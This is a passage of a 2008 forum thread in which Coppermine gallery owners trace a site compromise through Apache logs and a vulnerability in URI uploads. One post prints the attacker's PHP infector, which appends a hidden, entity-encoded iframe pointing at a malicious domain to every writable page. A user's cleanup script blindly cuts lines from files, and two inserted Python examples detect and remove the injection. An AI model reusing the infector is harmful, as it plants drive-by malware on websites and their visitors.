Someone has Redirected my Site to cdpuvbhfzz.com-What do I do? - Page 2

Started by htgguy, April 06, 2008, 10:04:11 PM


Nibbler

Why do you people have webservers configured to run zip files using PHP? Are you running images as PHP too?

tfischer

I don't want to fall victim to FUD, but I also don't want to be hacked. I also don't want to bring my gallery down quite yet... As a precaution I have removed the files update.php and pluginmgr.php from my gallery. I'm not sure if this will prevent a hack, but since these two files keep coming up, I thought it might be a precaution worth taking, especially since these files aren't needed for normal gallery browsing.

-Tim

mr.goose

@ Nibbler. We don't. (Just double checked.)  :)

Best wishes, G

tfischer


mr.goose

OKAY, the relevant part of my apache2.log file. Seems we were actually attacked three times. The first two were unsuccessful.

Attack #1 Note the entries for 83.237.241.116 and note the error 404 at the end. Attack failed presumably because on our server /coppermine/plugins/ is not writeable by the web server.

83.237.241.116 - - [06/Apr/2008:16:23:44 +0100] "GET /coppermine/update.php HTTP/1.1" 200 29995 "-" "Mozilla/8.0"
61.247.217.35 - - [06/Apr/2008:16:24:31 +0100] "GET /coppermine/thumbnails.php?album=search&lang=french&search=2003-11-14 HTTP/1.1" 200 67845 "-" "Yeti/1.0 (+http://help.naver.com/robots/)"
83.237.241.116 - - [06/Apr/2008:16:24:32 +0100] "POST /coppermine/pluginmgr.php?op=upload HTTP/1.1" 200 22782 "-" "Mozilla/8.0"
83.237.241.116 - - [06/Apr/2008:16:24:34 +0100] "GET /coppermine/plugins/docs.php HTTP/1.1" 404 2536 "-" "Mozilla/8.0"

Attack #2 Again note the entries for 83.237.241.116:-

83.237.241.116 - - [06/Apr/2008:16:27:49 +0100] "GET /coppermine/update.php HTTP/1.1" 200 29995 "-" "Mozilla/8.0"
74.6.25.239 - - [06/Apr/2008:16:28:41 +0100] "GET /coppermine/login.php?referer=displayimage.php%3Falbum%3Dtoprated%26cat%3D0%26pos%3D48 HTTP/1.1" 200 23577 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
83.237.241.116 - - [06/Apr/2008:16:28:43 +0100] "POST /coppermine/pluginmgr.php?op=upload HTTP/1.1" 200 22782 "-" "Mozilla/8.0"
194.164.232.81 - - [06/Apr/2008:16:28:44 +0100] "GET /coppermine/albums/archive/project/screengrab/20080406_Firefox_UK_English_Search.png HTTP/1.1" 304 - "http://www.purestorm.com/forum/readThread.aspx?id=41269&start=2" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.13) Gecko/20080325 Ubuntu/7.10 (gutsy) Firefox/2.0.0.13"
83.237.241.116 - - [06/Apr/2008:16:28:45 +0100] "GET /coppermine/plugins/docs.php HTTP/1.1" 404 2536 "-" "Mozilla/8.0"orwegian HTTP/1.1" 200 57537 "-" "Yeti/1.0 (+http://help.naver.com/robots/)"

Attack #3 This time it's successful. Note the entries for 91.76.23.21; other IPs are irrelevant. The time of the last entry corresponds exactly with the time stamp on the zip file mentioned in my previous post:-

91.76.23.21 - - [08/Apr/2008:18:03:12 +0100] "GET /coppermine/update.php HTTP/1.1" 200 30007 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
91.76.23.21 - - [08/Apr/2008:18:04:16 +0100] "POST /coppermine/upload.php HTTP/1.1" 200 22625 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
74.6.29.54 - - [08/Apr/2008:18:04:15 +0100] "GET /coppermine/displayimage.php?pos=-7004&lang=turkish HTTP/1.1" 200 32144 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
91.76.23.21 - - [08/Apr/2008:18:04:18 +0100] "POST /coppermine/upload.php HTTP/1.1" 200 68582 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
61.247.217.42 - - [08/Apr/2008:18:04:22 +0100] "GET /coppermine/thumbnails.php?album=247&lang=persian HTTP/1.1" 200 59160 "-" "Yeti/1.0 (+http://help.naver.com/robots/)"
81.202.91.57 - - [08/Apr/2008:18:04:27 +0100] "GET /new_mill/spring98/jpegs/newton.jpg HTTP/1.1" 304 - "http://www.taringa.net/posts/imagenes/948191/Algunas-fotos-de-Helmut-Newton.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; uE v7; uE v7)"
91.76.23.21 - - [08/Apr/2008:18:03:12 +0100] "GET /coppermine/update.php HTTP/1.1" 200 30007 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
91.76.23.21 - - [08/Apr/2008:18:04:23 +0100] "POST /coppermine/upload.php HTTP/1.1" 200 22515 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
91.76.23.21 - - [08/Apr/2008:18:04:28 +0100] "POST /coppermine/admin.php HTTP/1.1" 200 22414 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"

I hope this might shed some light on the matter. Best wishes, G.

sharpo

Just had a look on mine & the IP address matches one of yours

83.237.241.116 - - [06/Apr/2008:17:47:18 +0200] "POST /coppermine/pluginmgr.php?op=upload HTTP/1.1" 302 19518
Sharpo (not an expert, just a Coppermine user)
3 live galleries, first started in 2006.
http://www.sharpos-world.co.uk/BB3cpg/ with over 8,000 images.
http://www.sharpos-world.co.uk/cpg/ with over 25,000 images. 1.6.25
http://www.sharpos-world.co.uk/kc/ with over 300 images. 1.6.25

mr.goose

Quote from: sharpo on April 09, 2008, 12:57:51 AM
Just had a look on mine & the IP address matches one of yours

83.237.241.116 - - [06/Apr/2008:17:47:18 +0200] "POST /coppermine/pluginmgr.php?op=upload HTTP/1.1" 302 19518

Hmm, interesting Sharpo.

I think we may be looking at two slightly types of attack. Whilst they both seem to start with update.php, it seems that the one from 83.237.241.116 (the one that failed in my case) affects pluginmgr.php.  Then there is another from 91.76.23.21 that exploits upload.php instead

I also observed that the French guy on the other forum was also hit from IP 91.76.23.21, which also attacked his upload.php.
http://forum.coppermine-gallery.net/index.php/topic,51692.0.html

Hope this helps someone. Best wishes, G.



mr.goose

Oops typo. I meant two slightly different types of attack. Sorry

Best wishes, G.

Joachim Müller

Most replies on this thread (except the report by mr.goose) are invalid. Please don't PM me. Instead, read up what I suggested in this thread and post your report. Everyone who has been running an older version than cpg1.4.16 when he/she got infected should try to fix this on his own and not reply here. Keep this thread clean with only valid postings.

shiftsrl

I have the latest CPG version, but yesterday one of my users told me about some gallery visualization problems. I've checked the configuration and I've found, in the "Path to custom header include" setting, a link to /mygallery/albums/userpics/142739_298w3.zip. I've downloaded this file, which is really a .php file, not a .zip one, and this is the start of the content:

<?php
// Returns the part of the file name after the last dot.
function fileExtension($file) {
    $fileExp = explode('.', $file);
    $filetype = $fileExp[count($fileExp)-1];
    return $filetype;
}

// Walks one directory: returns its sub-directories and appends a hidden
// 1x1 iframe (src written as HTML entities) to every .php/.html/.htm file
// the web server can write to, except debugger.inc.php.
function parse($path) {
    $dir_array = array();
    if ($handle = opendir($path)) {
        while (false !== ($file = readdir($handle))) {
            if ($file != "." && $file != "..") {
                $try_dir = $path.$file.'/';
                if (is_dir($try_dir)) {
                    array_push($dir_array, $try_dir);
                } else {
                    if ($path[strlen($path)-1] != '/') {
                        $path .= '/';
                    }
                    $f_ext = fileExtension($file);
                    if ($f_ext == "php" || $f_ext == "html" || $f_ext == "htm") {
                        if ($file != "debugger.inc.php") {
                            //chmod($path.$file,0777);
                            $fhandle = fopen($path.$file, 'a+');
                            if ($f_ext == "php") {
                                fwrite($fhandle, "<?php echo '<iframe src=\"&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;\" width=1 height=1></iframe>'; ?>\n");
                            } else {
                                fwrite($fhandle, "<iframe src=\"&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;\" width=1 height=1></iframe>");
                            }
                            fclose($fhandle);
                        }
                    }
                }
            }
        }
        closedir($handle);
    }
    return $dir_array;
}


I don't know what this code does, or where, how and when it was put here. I've always made all the upgrades as indicated.

Any suggestion?
Shift Srl
*Link Removed*

j_taubman

I'll probably get in trouble for posting this, but I thought I might be able to help someone. I was running 1.4.13, so I am not asking for help, just trying to help others in my situation.

If you get the damage to your files, what I did was take the script posted earlier and modify it to remove the last line of any affected files. Please note it worked for me, but I have no idea if it will cause any additional problems.

killorcure.php

<?php
// Returns the part of the file name after the last dot.
function fileExtension($file) {
    $fileExp = explode('.', $file);
    $filetype = $fileExp[count($fileExp)-1];
    return $filetype;
}

// Walks one directory: returns its sub-directories and calls cutline() on
// every .php/.html/.htm file except debugger.inc.php.
function parse($path) {
    $dir_array = array();
    if ($handle = opendir($path)) {
        while (false !== ($file = readdir($handle))) {
            if ($file != "." && $file != "..") {
                // Normalise the trailing slash before building child paths,
                // otherwise the first entry of a directory given without one
                // (e.g. DOCUMENT_ROOT) is looked up at the wrong path.
                if ($path[strlen($path)-1] != '/') {
                    $path .= '/';
                }
                $try_dir = $path.$file.'/';
                if (is_dir($try_dir)) {
                    array_push($dir_array, $try_dir);
                } else {
                    $f_ext = fileExtension($file);
                    if ($f_ext == "php" || $f_ext == "html" || $f_ext == "htm") {
                        if ($file != "debugger.inc.php") {
                            cutline($path.$file);
                        }
                    }
                }
            }
        }
        closedir($handle);
    }
    return $dir_array;
}

// Breadth-first walk of the whole document root.
function launch() {
    $total = 0;
    $last = 1;
    $last_num = 0;
    $path = $_SERVER['DOCUMENT_ROOT'];
    $dirs = array();
    array_push($dirs, $path);

    while ($last) {
        $last_num = 0;
        for ($j = $total; $j < $total + $last; $j++) {
            $temp_dirs = parse($dirs[$j]);
            $last_t = sizeof($temp_dirs);
            $last_num += $last_t;
            for ($i = 0; $i < $last_t; $i++) {
                array_push($dirs, $temp_dirs[$i]);
            }
        }
        $total += $last;
        $last = $last_num;
    }
}

// Rewrites $filename without line $line_no (1-based); -1 means the last line.
// Returns TRUE if a line was dropped.
function cutline($filename, $line_no = -1) {
    $strip_return = FALSE;

    $data = file($filename);
    $pipe = fopen($filename, 'w');
    $size = count($data);

    if ($line_no == -1) {
        $skip = $size - 1;
    } else {
        $skip = $line_no - 1;
    }

    for ($line = 0; $line < $size; $line++) {
        if ($line != $skip) {
            fputs($pipe, $data[$line]);
        } else {
            $strip_return = TRUE;
        }
    }
    fclose($pipe);

    return $strip_return;
}

echo "~!";
launch();
?>




DO NOT run it more than once as it does not mind what is on the line it deletes
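A safer version of the cleanup in the two posts above, added here as an example rather than code from the thread or the Coppermine project: instead of cutting the last line of every PHP/HTML file whatever it holds, it removes only lines carrying an iframe whose entity-decoded src points at the domain in the thread title, reports before it writes, and can be re-run without damage. It assumes the injected marker sits on its own line, as the sample's fwrite produces.

```python
import html
import os
import re

# Host named in this thread. The sample writes the iframe src as HTML entities (and the
# forum copy doubles the encoding), so decode before comparing instead of grepping a literal.
INJECTED_HOST = "cdpuvbhfzz.com"
IFRAME_RE = re.compile(r'<iframe\s+src="([^"]*)"[^>]*>\s*</iframe>', re.IGNORECASE)
EXTENSIONS = (".php", ".html", ".htm")   # the file types the sample appends to

def is_injected(line):
    """True if the line carries an iframe whose decoded src points at INJECTED_HOST."""
    return any(INJECTED_HOST in html.unescape(html.unescape(src))
               for src in IFRAME_RE.findall(line))

def clean_text(text):
    """Drop only injected lines; return (cleaned_text, lines_removed). Idempotent."""
    lines = text.splitlines(keepends=True)
    kept = [l for l in lines if not is_injected(l)]
    return "".join(kept), len(lines) - len(kept)

def clean_tree(root, dry_run=True):
    """Walk root; return {path: lines_removed} for affected files. Rewrites only if dry_run=False."""
    report = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="surrogateescape") as fh:
                cleaned, removed = clean_text(fh.read())
            if removed:
                report[path] = removed
                if not dry_run:
                    with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
                        fh.write(cleaned)
    return report

# Constructed sample: a small PHP file with the line the thread's sample appends to .php files.
_ENC_URL = "".join("&#%d;" % ord(c) for c in "http://cdpuvbhfzz.com/dl/adv598.php")
SAMPLE_PHP = ("<?php\n$x = 1;\n?>\n"
              "<?php echo '<iframe src=\"%s\" width=1 height=1></iframe>'; ?>\n" % _ENC_URL)

if __name__ == "__main__":
    import sys   # usage: python clean_iframe.py /path/to/webroot [--write]
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, n in clean_tree(root, dry_run="--write" not in sys.argv).items():
        print(f"{path}: {n} injected line(s)")
```

Run it without --write first and compare the report against the files the web server can actually write to, as mr.goose did.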

mr.goose

I have been trying to figure this out all night. As Joachim rightly said earlier, if one is running more than one php application on a hacked server then it is difficult to say which PHP application is causing the problem. For example we run Joomla and PHPBB3 as well as a number of smaller applications, any one of which could be to blame (though they are all latest versions). So I've been looking at the scripts involved with this hack for clues with regard to the application it tries to exploit. I think the 142739_298w3.zip script may have a clue. Now, the interesting line is the one that makes reference to debugger.inc.php.

...
if($file!="debugger.inc.php") {
    //chmod($path.$file,0777);

I just performed a search on my entire server. Seems the only PHP application on my server that has a file called debugger.inc.php is Coppermine. So I Googled it. Seems of the major PHP web applications, Coppermine is indeed the only one I can find that uses a file called debugger.inc.php. This does not prove the hack is Coppermine's fault but it does perhaps suggest that the hackers may have singled out Coppermine for special attention? Anyone got any thoughts?

Best wishes, G.

Hein Traag

I did a likewise search and, although it does seem to infect all php files on a server it attacks, it does seem to gain entrance through debugger.inc.php. Or so it seems if you want to believe all the other reports on the net that are being written.

But like you said this does NOT prove the blame lies with coppermine, as a lot of the reports I read do not mention cpg being used together with the site which was infected.

mr.goose

Thing is Hein, in order for the 142739_298w3.zip file to be placed on the compromised machine, the hack to gain entry would already have taken place - if you see what I mean?

In our case, the Apache logs indicate that at exactly the time the various files on my system were altered, a known hacking machine with the IP 91.76.23.21 was communicating with certain key Coppermine files on my server (extraneous and irrelevant log entries removed for clarity):-

91.76.23.21 - - [08/Apr/2008:18:03:12 +0100] "GET /coppermine/update.php HTTP/1.1" 200 30007 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
91.76.23.21 - - [08/Apr/2008:18:04:16 +0100] "POST /coppermine/upload.php HTTP/1.1" 200 22625 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
91.76.23.21 - - [08/Apr/2008:18:04:18 +0100] "POST /coppermine/upload.php HTTP/1.1" 200 68582 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
91.76.23.21 - - [08/Apr/2008:18:03:12 +0100] "GET /coppermine/update.php HTTP/1.1" 200 30007 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
91.76.23.21 - - [08/Apr/2008:18:04:23 +0100] "POST /coppermine/upload.php HTTP/1.1" 200 22515 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
91.76.23.21 - - [08/Apr/2008:18:04:28 +0100] "POST /coppermine/admin.php HTTP/1.1" 200 22414 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"

Another interesting fact in our case is that I limit the files that the webserver can write to on a "need to write" basis. This means that only those files to which the web server had write access were modified. It means my cleanup will be reasonably straightforward. It also means that the files update.php, upload.php & admin.php are all unaltered and exactly the same as the originals. Yet the log evidence suggests that it was these files that the hackers exploited in order to get access to my server in order to place the 142739_298w3.zip file on the server in the first place.

Again this is not concrete proof but it may be another clue? What are your thoughts?

Meantime, I'll keep digging and report back if I come up with anything that might be helpful to you guys.


Best wishes, G.
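The pattern mr.goose reads out of his logs in this post and in his earlier one (a GET of update.php, then a POST to pluginmgr.php or upload.php from the same client shortly after, with a 404 on the dropped plugins/*.php file when the write failed and a 200 POST to admin.php when it succeeded) can be checked mechanically. The following Python is an added example, not code from the thread or the Coppermine project: it groups Apache combined-format lines by client and reports which clients show that sequence, using the excerpts quoted in the thread as sample input (user-agent strings shortened); the 300-second window is an assumption.

```python
import re
from collections import defaultdict
from datetime import datetime
# Apache combined log; referer and user-agent are not needed for this check.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
PROBE = "/coppermine/update.php"   # fetched first in every excerpt in the thread
UPLOADS = ("/coppermine/pluginmgr.php", "/coppermine/upload.php")
WINDOW_SECONDS = 300               # assumed: the upload POST must follow the probe within this
def parse_line(line):
    """One log line -> dict (query string dropped from the path), or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "method": m["method"], "status": int(m["status"]),
            "path": m["path"].split("?")[0],
            "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")}
def find_suspicious(lines):
    """Map client IP -> verdict for clients showing the probe-then-upload-POST pattern."""
    by_ip = defaultdict(list)
    for rec in filter(None, map(parse_line, lines)):
        by_ip[rec["ip"]].append(rec)
    verdicts = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        probes = [r["ts"] for r in recs if r["method"] == "GET" and r["path"] == PROBE]
        posts = [r for r in recs if r["method"] == "POST" and r["path"] in UPLOADS]
        if not probes or not any(0 <= (p["ts"] - probes[0]).total_seconds() <= WINDOW_SECONDS
                                 for p in posts):
            continue
        # Thread: 404 on the dropped plugins/*.php = write failed; 200 POST admin.php = success.
        dropped_404 = any(r["path"].startswith("/coppermine/plugins/") and r["status"] == 404
                          for r in recs)
        admin_post = any(r["method"] == "POST" and r["path"] == "/coppermine/admin.php"
                         and r["status"] == 200 for r in recs)
        verdicts[ip] = ("likely successful" if admin_post else
                        "attempted, dropped file not served (404)" if dropped_404 else "attempted")
    return verdicts

# Sample lines copied from the excerpts quoted in this thread, plus one crawler line as a control.
SAMPLE_LOG = [
    '83.237.241.116 - - [06/Apr/2008:16:23:44 +0100] "GET /coppermine/update.php HTTP/1.1" 200 29995 "-" "Mozilla/8.0"',
    '61.247.217.35 - - [06/Apr/2008:16:24:31 +0100] "GET /coppermine/thumbnails.php?album=search&lang=french&search=2003-11-14 HTTP/1.1" 200 67845 "-" "Yeti/1.0"',
    '83.237.241.116 - - [06/Apr/2008:16:24:32 +0100] "POST /coppermine/pluginmgr.php?op=upload HTTP/1.1" 200 22782 "-" "Mozilla/8.0"',
    '83.237.241.116 - - [06/Apr/2008:16:24:34 +0100] "GET /coppermine/plugins/docs.php HTTP/1.1" 404 2536 "-" "Mozilla/8.0"',
    '91.76.23.21 - - [08/Apr/2008:18:03:12 +0100] "GET /coppermine/update.php HTTP/1.1" 200 30007 "-" "Opera/9.27"',
    '91.76.23.21 - - [08/Apr/2008:18:04:16 +0100] "POST /coppermine/upload.php HTTP/1.1" 200 22625 "-" "Opera/9.27"',
    '91.76.23.21 - - [08/Apr/2008:18:04:28 +0100] "POST /coppermine/admin.php HTTP/1.1" 200 22414 "-" "Opera/9.27"',
]
```

Feed it a whole access log with `find_suspicious(open("access.log").readlines())`; crawlers and normal visitors never fetch update.php and then POST to an upload script, so they drop out.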

Nibbler

Question for the affected: Do you all have URI uploads enabled?

mr.goose

Quote from: Nibbler on April 09, 2008, 03:48:16 PM
Question for the affected: Do you all have URI uploads enabled?

Within Coppermine? Yes I do. Why do you ask?

Best wishes, G

sharpo


Nibbler

Thanks. I've found a vulnerability there. Fix should be available soon, but for now you should disable that feature.

mr.goose

Quote from: Nibbler on April 09, 2008, 04:34:24 PM
Thanks. I've found a vulnerability there. Fix should be available soon, but for now you should disable that feature.

Well done Nibbler! You guys are pretty quick. :)

OKAY. I said I'd post with more research when I had done it. I wasn't sure whether to post this research here or start a new thread. Apologies if I have done wrong. Thing is, I've been trying to figure out what the hacker was hoping to achieve with this hack. The clue is what is contained within the iFrame and the site it links to. Basically, the linked site contains a php file (WARNING this file may be dangerous):-

When you "view source", you'll find some heavily obfuscated javascript (attached as text file). This code could, in theory, enable the hacker to:-

  • Make any popups he wants appear on your site and
  • Invisibly connect your site visitors to viruses and trojans etc.

By the way, there is quite a good article at SANS Internet Storm Center about exploits that use obfuscated Javascript hosted on a remote site:-

Anyway, I've not managed to crack the script obfuscation yet and I don't think the current script works very well anyway. But I just stumbled across a similarly hacked Coppermine site that has just been blacklisted by Google because of malware. I thought the Coppermine Dev Team might want to take a look at some point because this may be the shape of things to come. WARNING to everyone else: these hacked sites may be dangerous!

Seems this hack is potentially very nasty indeed and I suspect that many site owners are unaware they have been hacked at all. So any information the Coppermine Dev Team feels able to share with us regarding this hack would be very gratefully received please.
Best wishes, and thanks again for dealing with it so quickly. G.

Tano*87

OMG guys, I got the same thing just yesterday. I've deleted the script code from all the PHP pages (which means that I've edited a very large number of pages between coppermine and cutenews, and I still haven't retouched the ones from the forum yet) but it came back again today!!!! What do I have to do?